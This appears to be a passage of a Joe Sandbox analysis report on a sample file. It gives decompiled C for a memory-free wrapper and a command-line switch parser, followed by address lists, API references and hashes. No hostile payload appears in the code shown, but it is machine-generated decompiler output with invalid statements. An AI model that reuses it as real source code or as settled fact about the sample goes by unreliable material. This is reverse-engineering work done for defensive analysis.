                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 6103d15c53a3b65e51fde66215f4a1ac2e75cd194889f289be229b0c1c8eb1b6
                                                                                                                                                                                                        • Instruction ID: c6d600ae0667af0f8e10d7fba96dd9cccee285870a7174053f22d87475b3d1f6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6103d15c53a3b65e51fde66215f4a1ac2e75cd194889f289be229b0c1c8eb1b6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDB0123204420CB7CF001FC2EC09F857F1DE7C87A5F140000F60C460508E72941086A6
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00bc4cc8
                                                                                                                                                                                                        0x00bc4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: f26f088ba9dd6752a02d7525606eab526ae511adea40f978842ae7aa8381f9ae
                                                                                                                                                                                                        • Instruction ID: bf37640af9961244d9369a9db137ce7db6b58544154150dca42caf88840663e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f26f088ba9dd6752a02d7525606eab526ae511adea40f978842ae7aa8381f9ae
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29B0123100010CB78F001B42EC08C457F1DD6C42A47000010F50C420218F3398118595
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E00BC5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
void* _t162;
void* _t163;
char _t167;
char _t170;
CHAR* _t173;
void* _t177;
intOrPtr* _t183;
intOrPtr* _t192;
CHAR* _t199;
void* _t200;
CHAR* _t201;
void* _t205;
void* _t206;
int _t209;
void* _t210;
void* _t212;
void* _t213;
CHAR* _t218;
intOrPtr* _t219;
intOrPtr* _t220;
signed int _t221;
signed int _t223;

_t173 = __ecx;
_t61 =  *0xbc8004; // 0x9f7d84ca
_v8 = _t61 ^ _t221;
_push(__ebx);
_push(__esi);
_push(__edi);
_t209 = 1;
if(__ecx == 0 ||  *__ecx == 0) {
	_t63 = 1;
} else {
	L2:
	while(_t209 != 0) {
		_t67 =  *_t173;
		if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
			_t173 = CharNextA(_t173);
			continue;
		}
		_v272 = _t173;
		if(_t67 == 0) {
			break;
		} else {
			_t69 = _v272;
			_t177 = 0;
			_t213 = 0;
			_t163 = 0;
			_t202 = 1;
			do {
				if(_t213 != 0) {
					if(_t163 != 0) {
						break;
					} else {
						goto L21;
					}
				} else {
					_t69 =  *_t69;
					if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
						break;
					} else {
						_t69 = _v272;
						L21:
						_t155 =  *_t69;
						if(_t155 != 0x22) {
							if(_t202 >= 0x104) {
								goto L106;
							} else {
								 *((char*)(_t221 + _t177 - 0x108)) = _t155;
								_t177 = _t177 + 1;
								_t202 = _t202 + 1;
								_t157 = 1;
								goto L30;
							}
						} else {
							if(_v272[1] == 0x22) {
								if(_t202 >= 0x104) {
									L106:
									_t63 = 0;
									L125:
									_pop(_t210);
									_pop(_t212);
									_pop(_t162);
									return E00BC6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
								} else {
									 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
									_t177 = _t177 + 1;
									_t202 = _t202 + 1;
									_t157 = 2;
									goto L30;
								}
							} else {
								_t157 = 1;
								if(_t213 != 0) {
									_t163 = 1;
								} else {
									_t213 = 1;
								}
								goto L30;
							}
						}
					}
				}
				goto L131;
				L30:
				_v272 =  &(_v272[_t157]);
				_t69 = _v272;
			} while ( *_t69 != 0);
			if(_t177 >= 0x104) {
				E00BC6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
				asm("int3");
				_push(_t221);
				_t222 = _t223;
				_t71 =  *0xbc8004; // 0x9f7d84ca
				_v296 = _t71 ^ _t223;
				if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
					0x4f0 = 2;
					_t75 = E00BC597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
				} else {
					E00BC44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
					 *0xbc9124 = E00BC6285();
					_t75 = 0;
				}
				return E00BC6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
			} else {
				 *((char*)(_t221 + _t177 - 0x108)) = 0;
				if(_t213 == 0) {
					if(_t163 != 0) {
						goto L34;
					} else {
						goto L40;
					}
				} else {
					if(_t163 != 0) {
						L40:
						_t79 = _v268;
						if(_t79 == 0x2f || _t79 == 0x2d) {
							_t83 = CharUpperA(_v267) - 0x3f;
							if(_t83 == 0) {
								_t202 = 0x521;
								E00BC44B9(0, 0x521, 0xbc1140, 0, 0x40, 0);
								_t85 =  *0xbc8588; // 0x0
								if(_t85 != 0) {
									CloseHandle(_t85);
								}
								ExitProcess(0);
							}
							_t87 = _t83 - 4;
							if(_t87 == 0) {
								if(_v266 != 0) {
									if(_v266 != 0x3a) {
										goto L49;
									} else {
										_t167 = (0 | _v265 == 0x00000022) + 3;
										_t215 =  &_v268 + _t167;
										_t183 =  &_v268 + _t167;
										_t50 = _t183 + 1; // 0x1
										_t202 = _t50;
										do {
											_t88 =  *_t183;
											_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E00BC667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E00BC667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E00BC5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E00BC1680(0xbc8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E00BC667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E00BC667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xbc8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E00BC5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xbc8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xbc8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00BC1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E00BC658A(_t218, 0x104, 0xbc1140);
                                                                                                                                                                                                        																if(E00BC31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xbc8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xbc8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xbc8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xbc8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xbc8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xbc9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xbc9a2c =  *0xbc9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xbc8d48 =  *0xbc8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xbc9a2c =  *0xbc9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xbc9a2c =  *0xbc9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xbc8d48 =  *0xbc8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xbc9a2c =  *0xbc9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xbc8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xbc9a2c = 3;
                                                                                                                                                                                                        																	 *0xbc8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xbc8a2c != 0 &&  *0xbc8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xbc9a3c, 0xbc8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E00BC66C8(0xbc8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00bc5d49
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d19
                                                                                                                                                                                                        0x00bc5d19
                                                                                                                                                                                                        0x00bc5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d3f
                                                                                                                                                                                                        0x00bc5d3f
                                                                                                                                                                                                        0x00bc5d4b
                                                                                                                                                                                                        0x00bc5d4b
                                                                                                                                                                                                        0x00bc5d4f
                                                                                                                                                                                                        0x00bc5d8d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d93
                                                                                                                                                                                                        0x00bc5d93
                                                                                                                                                                                                        0x00bc5d9a
                                                                                                                                                                                                        0x00bc5d9d
                                                                                                                                                                                                        0x00bc5d9e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d9e
                                                                                                                                                                                                        0x00bc5d51
                                                                                                                                                                                                        0x00bc5d5b
                                                                                                                                                                                                        0x00bc5d72
                                                                                                                                                                                                        0x00bc60fb
                                                                                                                                                                                                        0x00bc60fb
                                                                                                                                                                                                        0x00bc6207
                                                                                                                                                                                                        0x00bc620a
                                                                                                                                                                                                        0x00bc620b
                                                                                                                                                                                                        0x00bc620e
                                                                                                                                                                                                        0x00bc6217
                                                                                                                                                                                                        0x00bc5d78
                                                                                                                                                                                                        0x00bc5d78
                                                                                                                                                                                                        0x00bc5d80
                                                                                                                                                                                                        0x00bc5d83
                                                                                                                                                                                                        0x00bc5d84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d84
                                                                                                                                                                                                        0x00bc5d5d
                                                                                                                                                                                                        0x00bc5d5f
                                                                                                                                                                                                        0x00bc5d62
                                                                                                                                                                                                        0x00bc5d68
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00bc5d64
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d62
                                                                                                                                                                                                        0x00bc5d5b
                                                                                                                                                                                                        0x00bc5d4f
                                                                                                                                                                                                        0x00bc5d1d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d9f
                                                                                                                                                                                                        0x00bc5d9f
                                                                                                                                                                                                        0x00bc5da5
                                                                                                                                                                                                        0x00bc5dab
                                                                                                                                                                                                        0x00bc5dba
                                                                                                                                                                                                        0x00bc6218
                                                                                                                                                                                                        0x00bc621d
                                                                                                                                                                                                        0x00bc6220
                                                                                                                                                                                                        0x00bc6221
                                                                                                                                                                                                        0x00bc6229
                                                                                                                                                                                                        0x00bc6230
                                                                                                                                                                                                        0x00bc6247
                                                                                                                                                                                                        0x00bc626a
                                                                                                                                                                                                        0x00bc6272
                                                                                                                                                                                                        0x00bc6249
                                                                                                                                                                                                        0x00bc6255
                                                                                                                                                                                                        0x00bc625f
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6264
                                                                                                                                                                                                        0x00bc6284
                                                                                                                                                                                                        0x00bc5dc0
                                                                                                                                                                                                        0x00bc5dc0
                                                                                                                                                                                                        0x00bc5dca
                                                                                                                                                                                                        0x00bc5e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dcc
                                                                                                                                                                                                        0x00bc5dce
                                                                                                                                                                                                        0x00bc5e24
                                                                                                                                                                                                        0x00bc5e24
                                                                                                                                                                                                        0x00bc5e2c
                                                                                                                                                                                                        0x00bc5e47
                                                                                                                                                                                                        0x00bc5e4a
                                                                                                                                                                                                        0x00bc61d2
                                                                                                                                                                                                        0x00bc61e2
                                                                                                                                                                                                        0x00bc61e7
                                                                                                                                                                                                        0x00bc61ee
                                                                                                                                                                                                        0x00bc61f1
                                                                                                                                                                                                        0x00bc61f1
                                                                                                                                                                                                        0x00bc61f8
                                                                                                                                                                                                        0x00bc61f8
                                                                                                                                                                                                        0x00bc5e50
                                                                                                                                                                                                        0x00bc5e53
                                                                                                                                                                                                        0x00bc6109
                                                                                                                                                                                                        0x00bc611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6125
                                                                                                                                                                                                        0x00bc6137
                                                                                                                                                                                                        0x00bc613a
                                                                                                                                                                                                        0x00bc613c
                                                                                                                                                                                                        0x00bc613e
                                                                                                                                                                                                        0x00bc613e
                                                                                                                                                                                                        0x00bc6141
                                                                                                                                                                                                        0x00bc6141
                                                                                                                                                                                                        0x00bc6143
                                                                                                                                                                                                        0x00bc6144
                                                                                                                                                                                                        0x00bc614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc6150
                                                                                                                                                                                                        0x00bc6152
                                                                                                                                                                                                        0x00bc615c
                                                                                                                                                                                                        0x00bc6170
                                                                                                                                                                                                        0x00bc6172
                                                                                                                                                                                                        0x00bc617c
                                                                                                                                                                                                        0x00bc6190
                                                                                                                                                                                                        0x00bc6190
                                                                                                                                                                                                        0x00bc6196
                                                                                                                                                                                                        0x00bc61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc61ab
                                                                                                                                                                                                        0x00bc61b9
                                                                                                                                                                                                        0x00bc61c6
                                                                                                                                                                                                        0x00bc61c6
                                                                                                                                                                                                        0x00bc617e
                                                                                                                                                                                                        0x00bc6180
                                                                                                                                                                                                        0x00bc618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5f07
                                                                                                                                                                                                        0x00bc5f02
                                                                                                                                                                                                        0x00bc5efc
                                                                                                                                                                                                        0x00bc5ef7
                                                                                                                                                                                                        0x00bc5ef2
                                                                                                                                                                                                        0x00bc5f4c
                                                                                                                                                                                                        0x00bc5f4e
                                                                                                                                                                                                        0x00bc5f50
                                                                                                                                                                                                        0x00bc5f54
                                                                                                                                                                                                        0x00bc5ed4
                                                                                                                                                                                                        0x00bc5ea2
                                                                                                                                                                                                        0x00bc5ea4
                                                                                                                                                                                                        0x00bc5eaf
                                                                                                                                                                                                        0x00bc5eaf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e79
                                                                                                                                                                                                        0x00bc5e7d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e83
                                                                                                                                                                                                        0x00bc5e85
                                                                                                                                                                                                        0x00bc5e85
                                                                                                                                                                                                        0x00bc5e8e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e94
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5e94
                                                                                                                                                                                                        0x00bc5e8e
                                                                                                                                                                                                        0x00bc5e7d
                                                                                                                                                                                                        0x00bc5e77
                                                                                                                                                                                                        0x00bc5e6e
                                                                                                                                                                                                        0x00bc5e65
                                                                                                                                                                                                        0x00bc5e5c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5dd0
                                                                                                                                                                                                        0x00bc5dce
                                                                                                                                                                                                        0x00bc5dca
                                                                                                                                                                                                        0x00bc5dba
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc5d00
                                                                                                                                                                                                        0x00bc5dd9
                                                                                                                                                                                                        0x00bc5e04
                                                                                                                                                                                                        0x00bc61fe
                                                                                                                                                                                                        0x00bc5e0a
                                                                                                                                                                                                        0x00bc5e0c
                                                                                                                                                                                                        0x00bc5e17
                                                                                                                                                                                                        0x00bc5e17
                                                                                                                                                                                                        0x00bc5e04
                                                                                                                                                                                                        0x00bc6200
                                                                                                                                                                                                        0x00bc6200
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharNextA.USER32(?,00000000,?,?), ref: 00BC5CEE
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00BC8B3E,00000104,00000000,?,?), ref: 00BC5DFC
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC5E3E
                                                                                                                                                                                                        • CharUpperA.USER32(-00000052), ref: 00BC5EE1
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00BC5F6F
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC5FA7
                                                                                                                                                                                                        • CharUpperA.USER32(-0000004E), ref: 00BC6008
                                                                                                                                                                                                        • CharUpperA.USER32(?), ref: 00BC60AA
                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,00BC1140,00000000,00000040,00000000), ref: 00BC61F1
